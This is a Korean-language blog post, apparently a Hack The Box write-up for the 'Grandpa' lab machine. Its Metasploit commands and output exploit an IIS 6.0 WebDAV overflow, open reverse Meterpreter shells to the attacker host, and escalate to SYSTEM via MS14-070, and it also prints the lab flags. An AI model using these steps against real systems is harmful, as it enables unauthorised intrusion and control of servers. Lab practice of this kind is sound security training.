티스토리 뷰
728x90
반응형
- References
CVE-2017-7269 : Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
CVE-2014-4076 : Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)
- 바로 이전의 Granny 문제와 유사하여 유사한 흐름으로 진행하였습니다.
# nmap -sV -sT -sC -Pn 10.10.10.14
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info:
| Target_Name: GRANPA
| NetBIOS_Domain_Name: GRANPA
| NetBIOS_Computer_Name: GRANPA
| DNS_Domain_Name: granpa
| DNS_Computer_Name: granpa
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Date: Thu, 03 Jun 2021 03:35:30 GMT
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows- IIS 6.0의 webdav 가 열려있음을 확인했습니다.
# msfconsole
msf6 > search iis 6.0 webdav
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow- IIS 6.0 webdav 관련 취약점을 검색해보니 위와 같은 취약점이 발견되었습니다.
msf6 > use 0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.16
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit- 타켓 설정 후 exploit를 시도해보았습니다.
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.14:1031) at 2021-06-02 23:42:16 -0400
meterpreter > shell
Process 2308 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service- shell 접속 시 nt authority\network service 계정으로 접속됨을 확인하였습니다.
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 05:32 PM <DIR> .
04/12/2017 05:32 PM <DIR> ..
04/12/2017 05:12 PM <DIR> Administrator
04/12/2017 05:03 PM <DIR> All Users
04/12/2017 05:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 18,092,687,360 bytes free
C:\Documents and Settings>cd Harry
cd Harry
Access is denied.- user flag 가 존재할 것으로 예상되는 디렉토리에 접근이 되지 않았습니다. Administrator 또한 마찬가지입니다. 해당 권한보다 더 높은 권한이 있을까 싶어 nt authority network service escalate privileges 에 관한 정보를 검색해보았습니다. 결론적으로 nt authority/system 권한이 있음을 알았습니다.
- 그리고 local exploit suggester 를 이용하여 system 으로의 권한 상승 가능 여부를 확인했습니다.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search local suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed- target에 알맞은 exploit tool을 선택 후 exploit을 시도하려고 해보았으나 아래와 같은 오류가 발생하였습니다.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > exploit
[*] Started reverse TCP handler on 10.10.14.16:4445
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.- 뭔가 getsid 를 시도했으나 실패했다는 경고인 것 같아, 다시 기존 세션의 shell 에 접근하여 getuid 를 해보았을 때 문제를 알 수 있었습니다.
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.- 제대로 권한이 적용되지 않은 것 같았습니다. 그래서 Granny 에서 했던 것과 같이 실제 NT AUTHORITY/NETWORK SERVICE 권한으로 동작하는 프로세스에 본 프로세스를 migrate 한 뒤에 다시 getuid를 해보았을 때, 잘 나오는 것을 확인할 수 있었습니다.
meterpreter > migrate 1828
[*] Migrating from 2328 to 1828...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE- 이후 다시 local exploit 를 실행했을 땐 잘 됐습니다.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > exploit
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 3 opened (10.10.14.16:4444 -> 10.10.10.14:1032) at 2021-06-03 00:27:49 -0400- 아래는 flag 정보입니다.
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5ec67c3cff017f2bedc146a5d869
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b728x90
반응형
'보안 > Wargame' 카테고리의 다른 글
| [Hackthebox] - Templated Writeup(문제풀이) (0) | 2021.06.21 |
|---|---|
| [Hackthebox] - Legacy Writeup(문제풀이) (0) | 2021.06.09 |
| [Hackthebox] - Marshal in the Middle Writeup(문제풀이) (0) | 2021.06.08 |
| [Hackthebox] - I know Mag1k Writeup(문제풀이) (0) | 2021.06.01 |
| [Hackthebox] - Marketdump Writeup(문제풀이) (0) | 2021.05.24 |
댓글
